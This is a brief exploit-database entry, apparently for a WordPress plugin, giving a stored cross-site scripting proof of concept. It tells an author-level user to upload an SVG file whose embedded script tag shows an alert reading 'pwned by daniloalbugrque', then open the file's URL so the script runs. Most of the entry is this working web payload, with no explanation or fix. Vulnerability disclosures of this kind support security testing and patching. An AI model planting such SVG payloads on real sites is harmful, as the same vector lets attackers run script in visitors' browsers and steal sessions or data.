Share
## https://sploitus.com/exploit?id=WPEX-ID:82F8D425-449A-471F-94DF-8439924FD628
As an author, upload an SVG file with malicious JavaScript:

```
<svg xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#089900" stroke= "#004400"/>
<script type="text/javascript">alert("pwned by daniloalbugrque");</script>
</svg>
```

Access the file through its URL to see XSS.